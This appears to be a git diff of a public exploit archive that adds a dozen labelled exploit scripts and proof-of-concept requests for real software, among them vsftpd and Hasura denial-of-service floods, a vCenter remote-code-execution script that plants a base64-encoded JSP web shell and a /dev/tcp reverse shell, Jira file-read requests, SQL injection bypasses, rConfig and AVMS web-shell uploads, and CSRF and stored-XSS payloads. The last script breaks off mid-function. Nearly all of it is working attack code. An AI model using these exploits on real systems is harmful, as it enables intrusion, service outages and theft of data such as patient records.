except OSError: pass
def main():
global target, port, start
print banner
try:
target = sys.argv[1]
except:
print usage
sys.exit()
try:
port = int(sys.argv[2])
except:
port = 21
try:
conns = int(sys.argv[3])
except:
conns = 50
print("[!] Testing if {0}:{1} is open".format(target, port))
test(target, port)
print("[+] Port {} open, starting attack...".format(port))
time.sleep(2)
print("[+] Attack started on {0}:{1}!".format(target, port))
def loop(target, port, conns):
global start
threading.Thread(target=timer).start()
while 1:
for i in range(1, conns + 3):
t = threading.Thread(target=attack, args=(target,port,i,))
t.start()
if i > conns + 2:
t.join()
break
loop()
t = threading.Thread(target=loop, args=(target, port, conns,))
t.start()
def timer():
start = time.time()
while 1:
if start < time.time() + float(900): pass
else:
subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
t = threading.Thread(target=loop, args=(target, port,))
t.start()
break
main()

50
exploits/multiple/dos/49789.py Executable file
View file

@ -0,0 +1,50 @@
# Exploit Title: Hasura GraphQL 1.3.3 - Denial of Service
# Software: Hasura GraphQL
# Software Link: https://github.com/hasura/graphql-engine
# Version: 1.3.3
# Author: Dolev Farhi
# Date: 4/19/2021
# Tested on: Ubuntu
import sys
import requests
import threading
HASURA_SCHEME = 'http'
HASURA_HOST = '192.168.1.1'
HASURA_PORT = 80
THREADS = 300
def create_table():
data = {"type":"bulk","args":[{"type":"run_sql","args":{"sql":"CREATE TABLE \"public\".\"test_db\"(\"test\" text NOT NULL, PRIMARY KEY (\"test\") );","cascade":False,"read_only":False}},{"type":"add_existing_table_or_view","args":{"name":"test_db","schema":"public"}}]}
endpoint = '{}://{}:{}/v1/query'.format(HASURA_SCHEME, HASURA_HOST, HASURA_PORT)
r = requests.post(endpoint, json=data)
return r
def insert_row():
bomb = 'A' * 100000
data = {"type":"insert","args":{"table":{"name":"test_db","schema":"public"},"objects":[{"test":bomb}],"returning":[]}}
endpoint = '{}://{}:{}/v1/query'.format(HASURA_SCHEME, HASURA_HOST, HASURA_PORT)
r = requests.post(endpoint, json=data)
return r
def DoS():
dups = 'test \n ' * 1000000
data = {'query': 'query { test_db { ' + dups + '} }'}
endpoint = '{}://{}:{}/v1/graphql'.format(HASURA_SCHEME, HASURA_HOST, HASURA_PORT)
r = requests.post(endpoint, json=data)
return r
if not create_table().ok:
print('something went wrong, could not create table.')
sys.exit(1)
if not insert_row().ok:
print('something went wrong, could not insert row')
sys.exit(1)
while True:
for _ in range(THREADS):
print('Starting')
t = threading.Thread(target=DoS, args=())
t.start()

101
exploits/multiple/remote/49719.py Executable file
View file

@ -0,0 +1,101 @@
# Exploit Title: vsftpd 3.0.3 - Remote Denial of Service
# Date: 22-03-2021
# Exploit Author: xynmaps
# Vendor Homepage: https://security.appspot.com/vsftpd.html
# Software Link: https://security.appspot.com/downloads/vsftpd-3.0.3.tar.gz
# Version: 3.0.3
# Tested on: Parrot Security OS 5.9.0
#-------------------------------#
#encoding=utf8
#__author__ = XYN/Dump/NSKB3
#VSFTPD Denial of Service exploit by XYN/Dump/NSKB3.
"""
VSFTPD only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server,
you can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited.
(if it's limited, just run this script from different proxies using proxychains, and it will work)
"""
import socket
import sys
import threading
import subprocess
import time
banner = """
._________________.
| VS-FTPD |
| D o S |
|_________________|
|By XYN/DUMP/NSKB3|
|_|_____________|_|
|_|_|_|_____|_|_|_|
|_|_|_|_|_|_|_|_|_|
"""
usage = "{} <TARGET> <PORT(DEFAULT:21> <MAX_CONNS(DEFAULT:50)>".format(sys.argv[0])
def test(t,p):
s = socket.socket()
s.settimeout(10)
try:
s.connect((t, p))
response = s.recv(65535)
s.close()
return 0
except socket.error:
print("Port {} is not open, please specify a port that is open.".format(p))
sys.exit()
def attack(targ, po, id):
try:
subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
#print("Worker {} running".format(id))
except OSError: pass
def main():
global target, port, start
print banner
try:
target = sys.argv[1]
except:
print usage
sys.exit()
try:
port = int(sys.argv[2])
except:
port = 21
try:
conns = int(sys.argv[3])
except:
conns = 50
print("[!] Testing if {0}:{1} is open".format(target, port))
test(target, port)
print("[+] Port {} open, starting attack...".format(port))
time.sleep(2)
print("[+] Attack started on {0}:{1}!".format(target, port))
def loop(target, port, conns):
global start
threading.Thread(target=timer).start()
while 1:
for i in range(1, conns + 3):
t = threading.Thread(target=attack, args=(target,port,i,))
t.start()
if i > conns + 2:
t.join()
break
loop()
t = threading.Thread(target=loop, args=(target, port, conns,))
t.start()
def timer():
start = time.time()
while 1:
if start < time.time() + float(900): pass
else:
subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
t = threading.Thread(target=loop, args=(target, port,))
t.start()
break
main()

112
exploits/multiple/webapps/49435.rb Executable file
View file

File diff suppressed because one or more lines are too long

117
exploits/multiple/webapps/50056.py Executable file
View file

@ -0,0 +1,117 @@
# Exploit Title: VMware vCenter Server RCE 6.5 / 6.7 / 7.0 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 06/21/2021
# Exploit Author: CHackA0101
# Vendor Homepage: https://kb.vmware.com/s/article/82374
# Software Link: https://www.vmware.com/products/vcenter-server.html
# Version: This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).
# Tested on: VMware vCenter version 6.5 (OS: Linux 4.4.182-1.ph1 SMP UTC 2019 x86_64 GNU/Linux)
# CVE: 2021-21972
# More Info: https://github.com/chacka0101/exploits/blob/master/CVE-2021-21972/README.md
#!/usr/bin/python2
import os
import urllib3
import argparse
import sys
import requests
import base64
import tarfile
import threading
import time
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
myargs=argparse.ArgumentParser()
myargs.add_argument('-T','--target',help='The IP address of the target',required=True)
myargs.add_argument('-L','--local',help='Your local IP',required=True)
args=myargs.parse_args()
def getprompt(x):
print ("(CHackA0101-GNU/Linux)$ "+ str(x))
def getpath(path="/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/37/0/h5ngc.war/resources/shell4.jsp"):
fullpath="../" * 7 + path
return fullpath.replace('\\','/').replace('//','/')
def createbackdoor(localip):
# shell4.jsp
backdoor = "PGZvcm0gbWV0aG9kPSJHRVQiIGFjdGlvbj0iIj4KCTxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJjbWQiIC8+Cgk8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRXhlYyEiIC8+CjwvZm9ybT4gPCUhCnB1YmxpYyBTdHJpbmcgZXNjKFN0cmluZyBzdHIpewoJU3RyaW5nQnVmZmVyIHNiID0gbmV3IFN0cmluZ0J1ZmZlcigpOwoJZm9yKGNoYXIgYyA6IHN0ci50b0NoYXJBcnJheSgpKQoJCWlmKCBjID49ICcwJyAmJiBjIDw9ICc5JyB8fCBjID49ICdBJyAmJiBjIDw9ICdaJyB8fCBjID49ICdhJyAmJiBjIDw9ICd6JyB8fCBjID09ICcgJyApCgkJCXNiLmFwcGVuZCggYyApOwoJCWVsc2UKCQkJc2IuYXBwZW5kKCImIyIrKGludCkoYyYweGZmKSsiOyIpOwoJcmV0dXJuIHNiLnRvU3RyaW5nKCk7Cn0gJT48JQpTdHJpbmcgY21kID0gcmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpOwppZiAoIGNtZCAhPSBudWxsKSB7CglvdXQucHJpbnRsbigiPHByZT5Db21tYW5kIHdhczogPGI+Iitlc2MoY21kKSsiPC9iPlxuIik7CglqYXZhLmlvLkRhdGFJbnB1dFN0cmVhbSBpbiA9IG5ldyBqYXZhLmlvLkRhdGFJbnB1dFN0cmVhbShSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGNtZCkuZ2V0SW5wdXRTdHJlYW0oKSk7CglTdHJpbmcgbGluZSA9IGluLnJlYWRMaW5lKCk7Cgl3aGlsZSggbGluZSAhPSBudWxsICl7CgkJb3V0LnByaW50bG4oZXNjKGxpbmUpKTsKCQlsaW5lID0gaW4ucmVhZExpbmUoKTsKCX0KCW91dC5wcmludGxuKCI8L3ByZT4iKTsKfSAlPg=="
backdoor = base64.b64decode(backdoor).decode('utf-8')
f = open("shell4.jsp","w")
f.write(backdoor)
f.close()
# reverse.sh
# After decoding overwrite string 'CUSTOM_IP' for local IP
shell="IyEvYmluL2Jhc2gKYmFzaCAtaSA+JiAvZGV2L3RjcC9DVVNUT01fSVAvNDQzIDA+JjE="
shell=base64.b64decode(shell).decode('utf-8')
shell=shell.replace('CUSTOM_IP',localip)
f=open("reverse.sh","w")
f.write(shell)
f.close()
# Move on with the payload
payload_file=tarfile.open('payload.tar','w')
myroute=getpath()
getprompt('Adding web backdoor to archive')
payload_file.add("shell4.jsp", myroute)
myroute=getpath("tmp/reverse.sh")
getprompt('Adding bash backdoor to archive')
payload_file.add("reverse.sh", myroute)
payload_file.close()
# cleaning up a little bit
os.unlink("reverse.sh")
os.unlink("shell4.jsp")
getprompt('Backdoor file just was created.')
def launchexploit(ip):
res=requests.post('https://' + ip + '/ui/vropspluginui/rest/services/uploadova', files={'uploadFile':open('payload.tar', 'rb')}, verify=False, timeout=60)
if res.status_code == 200 and res.text == 'SUCCESS':
getprompt('Backdoor was uploaded successfully!')
return True
else:
getprompt('Backdoor failed to be uploaded. Target denied access.')
return False
def testshell(ip):
getprompt('Looking for shell...')
shell_path="/ui/resources/shell4.jsp?cmd=uname+-a"
res=requests.get('https://' + ip + shell_path, verify=False, timeout=60)
if res.status_code==200:
getprompt('Shell was found!.')
response=res.text
if True:
getprompt('Shell is responsive.')
try:
response=re.findall("b>(.+)</",response)[0]
print('$>uname -a')
print(response)
except:
pass
return True
else:
getprompt('Sorry. Shell was not found.')
return False
def opendoor(url):
time.sleep(3)
getprompt('Executing command.')
requests.get(url, verify=False, timeout=1800)
def executebackdoor(ip, localip):
url="https://"+ip+"/ui/resources/shell4.jsp?cmd=bash%20/tmp/reverse.sh"
t=threading.Thread(target=opendoor,args=(url,))
t.start()
getprompt('Setting up socket '+localip+':443')
os.system('nc -lnvp 443')
if len(sys.argv)== 1:
myargs.print_help(sys.stderr)
sys.exit(1)
createbackdoor(args.local)
uploaded=launchexploit(args.target)
if uploaded:
tested=testshell(args.target)
if tested:
executebackdoor(args.target, args.local)
getprompt("Execution completed!")

87
exploits/multiple/webapps/50380.txt Normal file
View file

@ -0,0 +1,87 @@
# Exploit Title: Atlassian Jira Server Data Center 8.16.0 - Arbitrary File Read
# Date: 2021-10-05
# Exploit Author: Mayank Deshmukh
# Vendor Homepage: https://www.atlassian.com/
# Software Link: https://www.atlassian.com/software/jira/download/data-center
# Version: versions < 8.5.14, 8.6.0 ≤ version < 8.13.6, 8.14.0 ≤ version < 8.16.1
# Tested on: Kali Linux & Windows 10
# CVE : CVE-2021-26086
POC File #1 - web.xml
GET /s/cfx/_/;/WEB-INF/web.xml HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
POC File #2 - seraph-config.xml
GET /s/cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
POC File #3 - decorators.xml
GET /s/cfx/_/;/WEB-INF/decorators.xml HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
POC File #4 - /jira-webapp-dist/pom.properties
GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
POC File #5 - /jira-webapp-dist/pom.xml
GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
POC File #6 - /atlassian-jira-webapp/pom.xml
GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
POC File #7 - /atlassian-jira-webapp/pom.properties
GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

11
exploits/php/webapps/49353.txt Normal file
View file

@ -0,0 +1,11 @@
# Exploit Title: Resumes Management and Job Application Website 1.0 - Authentication Bypass (Sql Injection)
# Date: 2020-12-27
# Exploit Author: Kshitiz Raj (manitorpotterk)
# Vendor Homepage: http://egavilanmedia.com
# Software Link: https://egavilanmedia.com/resumes-management-and-job-application-website/
# Version: 1.0
# Tested on: Windows 10/Kali Linux
Step 1 - Go to url http://localhost/Resumes/login.html
Step 2 - Enter Username :- ' or '1'='1'#
Step 3 - Enter Password - anything

70
exploits/php/webapps/49665.txt Normal file
View file

@ -0,0 +1,70 @@
# Exploit Title: rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (1)
# Date: 2021-03-17
# Exploit Author: Murat ŞEKER
# Vendor Homepage: https://www.rconfig.com
# Software Link: https://www.rconfig.com/downloads/rconfig-3.9.6.zip
# Version: rConfig v3.9.6
# Install scripts :
# https://www.rconfig.com/downloads/scripts/install_rConfig.sh
# https://www.rconfig.com/downloads/scripts/centos7_install.sh
# https://www.rconfig.com/downloads/scripts/centos6_install.sh
# Tested on: centOS 7
# Notes : If you want to reproduce in your lab environment follow those links :
# http://help.rconfig.com/gettingstarted/installation
# then
# http://help.rconfig.com/gettingstarted/postinstall
# Description:
rConfig, the open source network device configuration management tool, is vulnerable to Arbitrary File Upload to RCE in /lib/crud/vendors.crud.php with parameter 'vendorLogo'.
The following steps can be carried out in duplicating this vulnerability.
- Login the rConfig application with your credentials.
- Repeat
POST /lib/crud/vendors.crud.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 root@5y4o1s35jvx342apl7392qrqxh3m7aw.burpcollaborator.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------122590832918963661283831488254
Content-Length: 36619
Origin: https://localhost
Connection: close
Referer: http://4hmnkrm42ug2n1to46m8lpapggmlp9e.burpcollaborator.net/ref
Cookie: PHPSESSID=eafcfe393af7dc2a3dd9bd1ea0e9e49b
Upgrade-Insecure-Requests: 1
Cache-Control: no-transform
-----------------------------122590832918963661283831488254
Content-Disposition: form-data; name="vendorName"
thisisrce
-----------------------------122590832918963661283831488254
Content-Disposition: form-data; name="vendorLogo"; filename="file.php"
Content-Type: image/png
<?php phpinfo(); ?>
-----------------------------122590832918963661283831488254
Content-Disposition: form-data; name="add"
add
-----------------------------122590832918963661283831488254
Content-Disposition: form-data; name="editid"
-----------------------------122590832918963661283831488254--
- Than go to http(s)://<SERVER>/images/vendor/file.php
Note: The file.php can be accessed without valid credentials.
If you change the <?php phpinfo(); ?> to <?php echo $_GET["cmd"];?>
and navigate the http(s)://<SERVER>/images/vendor/file.php?cmd=id
The `id` command will execute on server.

21
exploits/php/webapps/49712.html Normal file
View file

@ -0,0 +1,21 @@
# Exploit Title: GetSimple CMS Custom JS Plugin 0.1 - 'customhs_js_content' Cross-Site Request Forgery
# Exploit Author: Abhishek Joshi
# Date: March 25, 2021
# Vendor Homepage: http://get-simple.info/extend/plugin/custom-js/1267 / http://get-simple.info/download
# Software Link: http://get-simple.info/extend/export/5260/1267/custom-js.zip
# Version: 0.1
# Tested On: Windows 10 Pro + XAMPP + PHP Version 7.4.10
# Tested against: Firefox 78.7.0esr (64-bit)
# Vulnerability Description:
# Cross-Site Request Forgery (CSRF) vulnerability in Custom JS v0.1 plugin for GetSimple CMS allows remote attackers to inject arbitrary client-side script code into every webpage hosted on the CMS (Persistent Cross-Site Scripting), when an authenticated admin visiting a third-party site.
## CSRF POST Form Method
<html><body>
<form action="http://mygetsimplecms.local/admin/load.php?id=CustomJSPlugin" method="POST">
<input type="hidden" name="customjs_url_content" value="">
<input type="hidden" name="customjs_js_content" value="alert('Hello Abhishek Joshi from CSRF --> XSS all the things!')">
<input type="hidden" name="submit" value="Save Settings">
<input type="submit" value="Submit request">
</form>
</body></html>

22
exploits/php/webapps/49713.txt Normal file
View file

@ -0,0 +1,22 @@
# Title: Regis Inventory And Monitoring System 1.0 - 'Item List' Persistent Cross-Site Scripting
# Exploit Author: George Tsimpidas
# Date: 2021-03-25
# Vendor Homepage: www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/regis_inventory.zip
# Version : 1.0.0
# Tested on: Kali Linux 2020.4
# Category: Webapp
# Description
Regis Inventory And Monitoring System, suffers from a stored cross site scripting on Item's List Category
#PoC
1. Login as admin : http://localhost/regis_inventory/index.php
2. Visit : http://localhost/regis_inventory/item.php
3. Click add a New Item and input your payload on "Generic Name" textbox.
Payload : <script>alert("XSS")</script>
4. After inputting the Item values and submitting the form, it will trigger an XSS pop-up

44
exploits/php/webapps/49783.py Executable file
View file

@ -0,0 +1,44 @@
# Exploit Title: rconfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated) (2)
# Exploit Author: Vishwaraj Bhattrai
# Date: 18/04/2021
# Vendor Homepage: https://www.rconfig.com/
# Software Link: https://www.rconfig.com/
# Vendor: rConfig
# Version: <= v3.9.6
# Tested against Server Host: Linux+XAMPP
import requests
import sys
s = requests.Session()
host=sys.argv[1] #Enter the hostname
cmd=sys.argv[2] #Enter the command
def exec_cmd(cmd,host):
print "[+]Executing command"
path="https://%s/images/vendor/x.php?cmd=%s"%(host,cmd)
response=requests.get(path)
print response.text
print "\n[+]You can access shell via below path"
print path
def file_upload(cmd,host):
print "[+]Bypassing file upload"
burp0_url = "https://"+host+":443/lib/crud/vendors.crud.php"
burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------3835647072299295753759313500", "Origin": "https://demo.rconfig.com", "Connection": "close", "Referer": "https://demo.rconfig.com/vendors.php", "Upgrade-Insecure-Requests": "1"}
burp0_cookies = {"_ga": "GA1.2.71516207.1614715346", "PHPSESSID": ""}
burp0_data = "-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"vendorName\"\r\n\r\nCisco2\r\n-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"vendorLogo\"; filename=\"banana.php\"\r\nContent-Type: image/gif\r\n\r\n<?php $cmd=$_GET['x'];system($cmd);?>\n\r\n-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"add\"\r\n\r\nadd\r\n-----------------------------3835647072299295753759313500\r\nContent-Disposition: form-data; name=\"editid\"\r\n\r\n\r\n-----------------------------3835647072299295753759313500--\r\n"
requests.post(burp0_url, headers=burp0_headers, cookies=s.cookies,data=burp0_data)
exec_cmd(cmd,host)
def login(host,cmd):
print "[+]Logging in"
burp0_url = "https://"+host+":443/lib/crud/userprocess.php"
burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://demo.rconfig.com", "Connection": "close", "Referer": "https://demo.rconfig.com/login.php", "Upgrade-Insecure-Requests": "1"}
burp0_data = {"user": "admin", "pass": "admin", "sublogin": "1"} #Use valid set of credentials default is set to admin/admin
response=s.post(burp0_url, headers=burp0_headers, cookies=s.cookies, data=burp0_data)
file_upload(cmd,host)
login(host,cmd)

88
exploits/php/webapps/50017.py Executable file
View file

@ -0,0 +1,88 @@
# Exploit Title: OpenEMR 5.0.1.3 - '/portal/account/register.php' Authentication Bypass
# Date 15.06.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://www.open-emr.org/
# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_3.zip
# Version: All versions prior to 5.0.1.4
# Tested on: Ubuntu 18.04
# CVE: CVE-2018-15152
# CWE: CWE-287
# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-15152-Exploit
'''
Description:
An unauthenticated user is able to bypass the Patient Portal Login by simply navigating to
the registration page and modifying the requested url to access the desired page. Some
examples of pages in the portal directory that are accessible after browsing to the
registration page include:
- add_edit_event_user.php
- find_appt_popup_user.php
- get_allergies.php
- get_amendments.php
- get_lab_results.php
- get_medications.php
- get_patient_documents.php
- get_problems.php
- get_profile.php
- portal_payment.php
- messaging/messages.php
- messaging/secure_chat.php
- report/pat_ledger.php
- report/portal_custom_report.php
- report/portal_patient_report.php
Normally, access to these pages requires authentication as a patient. If a user were to visit
any of those pages unauthenticated, they would be redirected to the login page.
'''
'''
Import required modules:
'''
import requests
import argparse
'''
User-Input:
'''
my_parser = argparse.ArgumentParser(description='OpenEMR Authentication bypass')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--Openemrpath', type=str)
my_parser.add_argument('-R', '--PathToGet', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
openemr_path = args.Openemrpath
pathtoread = args.PathToGet
'''
Check for vulnerability:
'''
# Check, if Registration portal is enabled. If it is not, this exploit can not work
session = requests.Session()
check_vuln_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/portal/account/register.php'
check_vuln = session.get(check_vuln_url).text
print('')
print('[*] Checking vulnerability: ')
print('')
if "Enter email address to receive registration." in check_vuln:
print('[+] Host Vulnerable. Proceeding exploit')
else:
print('[-] Host is not Vulnerable: Registration for patients is not enabled')
'''
Exploit:
'''
header = {
'Referer': check_vuln_url
}
exploit_url = 'http://' + target_ip + ':' + target_port + openemr_path + pathtoread
Exploit = session.get(exploit_url, headers=header)
print('')
print('[+] Results: ')
print('')
print(Exploit.text)
print('')

75
exploits/php/webapps/50265.py Executable file
View file

@ -0,0 +1,75 @@
# Exploit Title: Patient Appointment Scheduler System 1.0 - Persistent/Stored XSS
# Date: 03/09/2021
# Exploit Author: a-rey
# Vendor Homepage: https://www.sourcecodester.com/php/14928/patient-appointment-scheduler-system-using-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14928
# Version: v1.0
# Tested on: Ubuntu 20.04.3 LTS (Focal Fossa) with XAMPP 8.0.10-0
# Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Patient_Appointment_Scheduler_System/v1.0/writeup.md
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import logging
import requests
import argparse
BANNER = """
Patient Appointment Scheduler System v1.0 - Persistent/Stored XSS
by: \033[0m\033[1;31m \033[0m
\033[0m\033[1;32m \033[0m
\033[0m\033[1;33m \033[0m
\033[0m\033[1;34m \033[0m
\033[0m\033[1;35m \033[0m
\033[0m\033[1;36m \033[0m
"""
def exploit(url:str, file:str) -> None:
if not os.path.exists(file):
logging.error(f'{file} does not exist?')
return
logging.info(f'reading {file} for XSS content ...')
with open(file, 'r') as f:
xssPayload = f.read()
logging.info(f'sending XSS payload ({len(xssPayload)} bytes) to {url}/classes/SystemSettings.php ...')
r = requests.post(url + '/classes/SystemSettings.php',
data={'about_us' : xssPayload},
params={'f' : 'update_settings'},
verify=False
)
if not r.ok:
logging.error('HTTP request failed')
return
logging.info('checking for XSS payload on main page ...')
r = requests.get(url)
if xssPayload not in r.text:
logging.error(f'XSS injection failed? received: {r.text}')
logging.warning('maybe about.html is not writable?')
return
logging.success('XSS payload found on target website')
return
if __name__ == '__main__':
# parse arguments
parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER)
parser.add_argument('-u', '--url', help='website URL', type=str, required=True)
parser.add_argument('-f', '--file', help='file with DOM content to inject', type=str, required=True)
parser.add_argument('--debug', help='enable debugging output', action='store_true', default=False)
args = parser.parse_args()
# define logger
logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO' if not args.debug else 'DEBUG')
logging.SUCCESS = logging.CRITICAL + 1
logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m')
logging.addLevelName(logging.ERROR, '\033[0m\033[1;31mFAIL\033[0m')
logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m')
logging.addLevelName(logging.INFO, '\033[0m\033[1;36mINFO\033[0m')
logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args)
# print banner
print(BANNER)
# run exploit
exploit(args.url, args.file)

77
exploits/php/webapps/50288.py Executable file
View file

@ -0,0 +1,77 @@
# Exploit Title: Apartment Visitor Management System (AVMS) 1.0 - 'username' SQL Injection
# Date: 2021-08-13
# Exploit Author: mari0x00
# Vendor Homepage: https://phpgurukul.com/apartment-visitors-management-system-using-php-and-mysql/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10395
# Version: 1.0
# Tested on: Windows 10 + XAMPP
#!/usr/bin/python3
import requests, socket, threading
import base64, time, sys
print(('''###########################################################''',"red"))
print(('''########### AVMS SQLi to RCE by mari0x00 ############''',"red"))
print(('''###########################################################''',"red"))
print("")
URL = input("Provide URL for AVMS (e.g. 'http://localhost/avms/'): ") or 'http://localhost/avms/'
path = input("Provide path for shell upload (default 'C:\\xampp\\htdocs\\avms\\lol.php'): ") or 'C:\\xampp\\htdocs\\avms\\lol.php'
path = path.replace("\\", "\\\\")
rhost = input("Provide attacker IP: ") or "127.0.0.1"
rport = input("Provide attacker listening port: ") or "1337"
# sending webshell
payload = {"username": "admin' union select '<?php system(base64_decode($_GET[\"cmd\"]));?>' into outfile '" + path + "' -- 'a", "password": "test", "login": ''}
requests.post(URL, data=payload)
def shell(rhost, rport):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.bind((rhost, int(rport)))
except socket.error as msg:
print("Bind failed. Error Code : " + str(msg[0]) + " Message " + msg[1])
sys.exit()
s.settimeout(5)
s.listen(5)
print('[+] Waiting for connection..')
conn = False
command=''
while conn == False:
try:
conn, addr = s.accept()
print("Got a connection from " + addr[0] + ":" + str(addr[1]))
conn.send('\n'.encode())
time.sleep(1)
print(conn.recv(0x10000).decode())
while(command != 'exit'):
command=input('')
conn.send((command + '\n').encode())
time.sleep(.3)
res = conn.recv(0x10000)
print(res.decode())
